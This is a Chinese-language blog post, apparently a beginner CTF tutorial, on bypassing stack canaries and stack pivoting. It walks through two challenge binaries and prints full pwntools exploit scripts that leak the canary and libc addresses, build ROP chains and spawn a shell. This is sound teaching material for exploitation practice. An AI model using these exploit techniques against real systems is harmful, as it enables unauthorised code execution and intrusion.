<!DOCTYPE html>





<html class="theme-next muse use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="generator" content="Hexo 3.7.1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.3.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.3.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.3.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.3.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    save_scroll: false,
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="浅析栈溢出遇到的两种坑及绕过技巧0x00前言对于刚开始入门pwn的萌新来说可能会遇到一些坑，这里我就来总结一下我之前做栈溢出的时候遇到的两种坑以及绕过技巧，具体我会通过例题来讲解，希望对此时正在入门的pwn的萌新能带来一些帮助。 0x01绕过canarycanary是linux下的保护机制，它会保存在栈的某个位置上，一般来说64位的话会在rbp-0x8的位置，32位则在ebp-0x4的位置。当我们">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://GD.com/2018/11/20/rop/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="浅析栈溢出遇到的两种坑及绕过技巧0x00前言对于刚开始入门pwn的萌新来说可能会遇到一些坑，这里我就来总结一下我之前做栈溢出的时候遇到的两种坑以及绕过技巧，具体我会通过例题来讲解，希望对此时正在入门的pwn的萌新能带来一些帮助。 0x01绕过canarycanary是linux下的保护机制，它会保存在栈的某个位置上，一般来说64位的话会在rbp-0x8的位置，32位则在ebp-0x4的位置。当我们">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/1.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/2.png">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/3.png">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/4.png">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/5.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/6.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/7.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/8.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/9.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/10.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/11.jpg">
<meta property="og:image" content="http://gd.com/2018/11/20/rop/12.png">
<meta property="og:updated_time" content="2018-11-20T11:48:33.870Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Hexo">
<meta name="twitter:description" content="浅析栈溢出遇到的两种坑及绕过技巧0x00前言对于刚开始入门pwn的萌新来说可能会遇到一些坑，这里我就来总结一下我之前做栈溢出的时候遇到的两种坑以及绕过技巧，具体我会通过例题来讲解，希望对此时正在入门的pwn的萌新能带来一些帮助。 0x01绕过canarycanary是linux下的保护机制，它会保存在栈的某个位置上，一般来说64位的话会在rbp-0x8的位置，32位则在ebp-0x4的位置。当我们">
<meta name="twitter:image" content="http://gd.com/2018/11/20/rop/1.jpg">
  <link rel="canonical" href="http://GD.com/2018/11/20/rop/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title> | Hexo</title>
  








  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  <div class="container sidebar-position-left">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content page-post-detail">
            

  <div id="posts" class="posts-expand">
    

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://GD.com/2018/11/20/rop/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="GD">
      <meta itemprop="description" content="a GOOD pwner">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">

            
          </h1>
        

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2018-11-20 17:52:38 / 修改时间：19:48:33" itemprop="dateCreated datePublished" datetime="2018-11-20T17:52:38+08:00">2018-11-20</time>
            </span>
          
            

            
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="浅析栈溢出遇到的两种坑及绕过技巧"><a href="#浅析栈溢出遇到的两种坑及绕过技巧" class="headerlink" title="浅析栈溢出遇到的两种坑及绕过技巧"></a>浅析栈溢出遇到的两种坑及绕过技巧</h1><h1 id="0x00前言"><a href="#0x00前言" class="headerlink" title="0x00前言"></a>0x00前言</h1><p>对于刚开始入门pwn的萌新来说可能会遇到一些坑，这里我就来总结一下我之前做栈溢出的时候遇到的两种坑以及绕过技巧，具体我会通过例题来讲解，希望对此时正在入门的pwn的萌新能带来一些帮助。</p>
<h1 id="0x01绕过canary"><a href="#0x01绕过canary" class="headerlink" title="0x01绕过canary"></a>0x01绕过canary</h1><p>canary是linux下的保护机制，它会保存在栈的某个位置上，一般来说64位的话会在rbp-0x8的位置，32位则在ebp-0x4的位置。当我们进行栈溢出的时候如果覆盖了canary值，程序就会调用<strong>stack_chk_fail</strong>来打印报错信息。在做题的时候最烦的就是这种，大大增加了栈溢出时的难度。通常有以下几种绕过方法：</p>
<p><strong>1、通过read函数泄露canary。</strong>关键的一点就是read函数读取字符串的时候不会在末尾加上“\x00”,这就是gets函数不能用来泄露canary的原因（有些输出函数遇到‘\0’会截断）。</p>
<p><strong>2、暴力破解canary。</strong>这种方法利用起来有限制，就是一般要程序中有fork函数创造出子进程，因为子进程是父进程复制出来的，所以canary也就跟父进程相同，在子进程中覆盖canary后报错就会退回到父进程，此时canary的值是不会改变的。</p>
<p><strong>3、劫持stack_chk_fail。</strong>因为canary被覆盖的时候会调用这个函数，所以如果我们可以利用程序中的漏洞（比如格式化字符串）改got表中<strong>stack_chk_fail</strong>的地址为one_gadget的地址就能getshell。</p>
<p><strong>4、利用stack_chk_fail的报错信息。</strong>在报错信息中，会将你发生栈溢出的程序名调用输出，其位置位于argv[0]，我们可以将argv[0]的地址改写为我们想要获取的内容的地址，使它随着错误提示一起输出。</p>
<p>这里我主要是介绍第一种方法</p>
<h2 id="“百度杯”-十二月场-easypwn"><a href="#“百度杯”-十二月场-easypwn" class="headerlink" title="“百度杯” 十二月场 easypwn"></a>“百度杯” 十二月场 easypwn</h2><p>1、我们来简单运行一下并看一下它的保护，这里主要开启了NX和canary保护。</p>
<p><img src="/2018/11/20/rop/1.jpg" alt="1"></p>
<p><img src="/2018/11/20/rop/2.png" alt="2"></p>
<p>2、用ida打开反编译，这个程序比较简单，有两处栈溢出，第一处栈溢出主要利用read函数泄露canary，第二处就可以正常地ROP了。</p>
<p><img src="/2018/11/20/rop/3.png" alt="3"></p>
<p>3、我们来看一下它的栈结构，buf在rbp-0x50的位置，而canary在rbp-0x8的位置，偏移为0x48.</p>
<p><img src="/2018/11/20/rop/4.png" alt="4"></p>
<p><img src="/2018/11/20/rop/5.jpg" alt="5"></p>
<p><img src="/2018/11/20/rop/6.jpg" alt="6"></p>
<p>4、这里我们可以构造0x48个a字符，因为末尾没有‘\0’，所以调用printf函数的时候就会把后面的canary泄露出来，这里要普及的一个知识点就是canary最低一个字节是“\x00”，所以泄露出来之后要减去0xa。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">io.recvuntil(&apos;Who are you?\n&apos;)</span><br><span class="line">io.sendline(&apos;a&apos;*0x48)</span><br><span class="line"></span><br><span class="line">io.recvuntil(&apos;a&apos;*0x48)</span><br><span class="line">canary=u64(io.recv(8))-0xa</span><br><span class="line">print hex(canary)</span><br></pre></td></tr></table></figure>
<p><img src="/2018/11/20/rop/7.jpg" alt="7"></p>
<p>5、接下来要用到的是syscall系统调用的情况，调用号是0x3b就是execve()函数，利用read函数的返回值使得rax为0x3b，因为这主要讲的是canary，在这里就不详述系统调用了，下面贴上完整exp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line">context.binary = &apos;./easypwn&apos;</span><br><span class="line">context.terminal = [&apos;tmux&apos;,&apos;sp&apos;,&apos;-h&apos;]</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">elf = ELF(&apos;./easypwn&apos;)</span><br><span class="line">io = process(&apos;./easypwn&apos;)</span><br><span class="line">#io = remote(&apos;106.75.66.195&apos;, 20000)</span><br><span class="line">#leak Canary</span><br><span class="line">io.recvuntil(&apos;Who are you?\n&apos;)</span><br><span class="line">io.sendline(&apos;a&apos;*0x48)</span><br><span class="line"></span><br><span class="line">io.recvuntil(&apos;a&apos;*0x48)</span><br><span class="line">canary=u64(io.recv(8))-0xa</span><br><span class="line">print hex(canary)</span><br><span class="line">log.info(&apos;canary:&apos;+hex(canary))</span><br><span class="line">#leak read_addr</span><br><span class="line">io.recvuntil(&apos;tell me your real name?\n&apos;)</span><br><span class="line">payload = &apos;A&apos;*(0x50-0x8)</span><br><span class="line">payload += p64(canary)</span><br><span class="line">payload += &apos;A&apos;*0x8</span><br><span class="line">payload += p64(0x4007f3)</span><br><span class="line">payload += p64(elf.got[&apos;read&apos;])</span><br><span class="line">payload += p64(elf.plt[&apos;puts&apos;])</span><br><span class="line">payload += p64(0x4006C6)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.recvuntil(&apos;See you again!\n&apos;)</span><br><span class="line">#cacl syscall_addr</span><br><span class="line">read_addr = u64(io.recvuntil(&apos;\n&apos;,drop=True).ljust(0x8,&apos;\x00&apos;))</span><br><span class="line">print &apos;read_addr:&apos;+hex(read_addr)</span><br><span class="line">syscall = read_addr+0xe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">log.info(&apos;syscall:&apos;+hex(syscall))</span><br><span class="line">sleep(0.5)</span><br><span class="line">io.recvuntil(&apos;Who are you?\n&apos;)</span><br><span class="line">io.sendline(&apos;A&apos;*(0x50-0x8))</span><br><span class="line"></span><br><span class="line">io.recvuntil(&apos;tell me your real name?\n&apos;)</span><br><span class="line">payload = &apos;A&apos;*(0x50-0x8)</span><br><span class="line">payload += p64(canary)</span><br><span class="line">payload += &apos;A&apos;*0x8</span><br><span class="line">payload += p64(0x4007EA)</span><br><span class="line">payload += p64(0)+p64(1)+p64(elf.got[&apos;read&apos;])+p64(0x3B)+p64(0x601018)+p64(0)</span><br><span class="line">payload += p64(0x4007D0)</span><br><span class="line">payload += p64(0)</span><br><span class="line">payload += p64(0)+p64(1)+p64(0x601020)+p64(0)+p64(0)+p64(0x601018)</span><br><span class="line">payload += p64(0x4007D0)</span><br><span class="line">io.send(payload)</span><br><span class="line">sleep(0.5)</span><br><span class="line"></span><br><span class="line">content = &apos;/bin/sh\x00&apos;+p64(syscall)</span><br><span class="line">content = content.ljust(0x3B,&apos;0&apos;)</span><br><span class="line">io.send(content)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="0x02栈迁移"><a href="#0x02栈迁移" class="headerlink" title="0x02栈迁移"></a>0x02栈迁移</h1><p>我们在做栈溢出的时候经常会遇到这样的问题，就是溢出的长度不够，这时候需要把栈迁移到我们能够控制的空间里去。这里主要用到汇编语言里的leave ret，我们来看一下leave，在64位下相当于</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mov rsp,rbp</span><br><span class="line">pop rbp</span><br></pre></td></tr></table></figure>
<p>就是说我们只要通过栈溢出控制了rbp，就能控制rsp，把栈迁移到我们想要的空间。这里有一个可能有误会的就是这个mov rsp,rbp，这个rbp指的是rbp的值，而不是我们要覆盖的rbp的值，后面的pop  rbp才是把我们覆盖的值，即rbp锁指向的栈空间的值赋值给rsp。</p>
<h2 id="具体例子"><a href="#具体例子" class="headerlink" title="具体例子"></a>具体例子</h2><p>这个题目是xman夏令营个人排位赛的一道pwn题（task_main_p3IegA3）</p>
<p>1、还是老样子先运行一遍再看保护，这里只开启了NX保护</p>
<p><img src="/2018/11/20/rop/8.jpg" alt="8"></p>
<p><img src="/2018/11/20/rop/9.jpg" alt="9"></p>
<p>2、ida反编译看下，这个程序非常简单，就只有几行代码，第一次输入保存在bss段，第二次输入在栈上，溢出的长度只能刚好覆盖到返回地址。。这时就需要我们把栈迁移到bss段上。</p>
<p><img src="/2018/11/20/rop/10.jpg" alt="10"></p>
<p>3、我们先用ROPgadget工具找到合适gadget，0x40060f就是我们想要的。</p>
<p><img src="/2018/11/20/rop/11.jpg" alt="11"></p>
<p>4、我们先来控制栈，我们不能把栈迁移到bss段一开始的地方，所以这里buf是我们输入的bss段+0x100的地址，因为程序本身就会执行leave ret汇编，执行的时候pop rbp，所以会把rbp移到bss段。但是此时rsp还留在栈上，所以我们把gadget填到返回地址就行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(&apos;stack:\n&apos;)</span><br><span class="line">payload1=&apos;a&apos;*10+p64(buf)+p64(leve_ret)</span><br><span class="line"></span><br><span class="line">p.sendline(payload1)</span><br></pre></td></tr></table></figure>
<p>5、下一步就是布置bss段上的数据，可以看出，栈已经被迁移到bss段了，这里会输出puts的地址。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload=&apos;A&apos;*0x100+p64(buf)+p64(popret)+p64(puts_got)+p64(puts_plt)+p64(main)</span><br><span class="line"></span><br><span class="line">p.recvuntil(&apos;bss:\n&apos;)</span><br><span class="line">p.sendline(payload)</span><br></pre></td></tr></table></figure>
<p><img src="/2018/11/20/rop/12.png" alt="12"></p>
<p>6、最后一步只需要把one_gadget填到返回地址就行啦。附上完整exp。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line">context.log_level=True</span><br><span class="line">p=process(&apos;./task_main_p3IegA3&apos;)</span><br><span class="line">#p=remote()</span><br><span class="line">elf=ELF(&apos;task_main_p3IegA3&apos;)</span><br><span class="line">libc=ELF(&apos;libc.so.6&apos;)</span><br><span class="line">buf=elf.bss()+0x20+0X100</span><br><span class="line">print hex(buf)</span><br><span class="line">puts_plt=elf.plt[&apos;puts&apos;]</span><br><span class="line">puts_got=elf.got[&apos;puts&apos;]</span><br><span class="line">read_plt=elf.plt[&apos;read&apos;]</span><br><span class="line">main=0x040061D</span><br><span class="line"></span><br><span class="line">leve_ret=0x040060F</span><br><span class="line">popret=0x0400693</span><br><span class="line"></span><br><span class="line">payload=&apos;A&apos;*0x100+p64(buf)+p64(popret)+p64(puts_got)+p64(puts_plt)+p64(main)</span><br><span class="line"></span><br><span class="line">p.recvuntil(&apos;bss:\n&apos;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(&apos;stack:\n&apos;)</span><br><span class="line">payload1=&apos;a&apos;*10+p64(buf)+p64(leve_ret)</span><br><span class="line"></span><br><span class="line">p.sendline(payload1)</span><br><span class="line"></span><br><span class="line">#p.recv()</span><br><span class="line"></span><br><span class="line">putsadd=u64(p.recvuntil(&apos;\n&apos;,drop=True).ljust(0x8,&apos;\x00&apos;))</span><br><span class="line">print hex(putsadd)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">libc_base = putsadd- libc.sym[&apos;puts&apos;]</span><br><span class="line">one_gadget = libc_base + 0x4526a</span><br><span class="line">p.recv()</span><br><span class="line">p.send(&quot;1&quot;)</span><br><span class="line">p.recv()</span><br><span class="line">pay= 18*&apos;a&apos; + p64(one_gadget)</span><br><span class="line">p.send(pay)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    
        
      

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2018/10/18/calendar/" rel="next" title="calendar">
                  <i class="fa fa-chevron-left"></i> calendar
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2018/11/20/house/" rel="prev" title="">
                   <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">GD</p>
  <div class="site-description motion-element" itemprop="description">a GOOD pwner</div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
  </nav>



        </div>
      </div>
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#浅析栈溢出遇到的两种坑及绕过技巧"><span class="nav-number">1.</span> <span class="nav-text">浅析栈溢出遇到的两种坑及绕过技巧</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00前言"><span class="nav-number">2.</span> <span class="nav-text">0x00前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01绕过canary"><span class="nav-number">3.</span> <span class="nav-text">0x01绕过canary</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#“百度杯”-十二月场-easypwn"><span class="nav-number">3.1.</span> <span class="nav-text">“百度杯” 十二月场 easypwn</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02栈迁移"><span class="nav-number">4.</span> <span class="nav-text">0x02栈迁移</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#具体例子"><span class="nav-number">4.1.</span> <span class="nav-text">具体例子</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">GD</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.7.1</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.3.0</div>

        








        
      </div>
    </footer>
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
      </div>

    

  </div>

  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

<script src="/js/utils.js?v=7.3.0"></script>
  <script src="/js/motion.js?v=7.3.0"></script>


  <script src="/js/schemes/muse.js?v=7.3.0"></script>


<script src="/js/next-boot.js?v=7.3.0"></script>




  




























  

  

  


  
  <script src="/js/scrollspy.js?v=7.3.0"></script>
<script src="/js/post-details.js?v=7.3.0"></script>


</body>
</html>
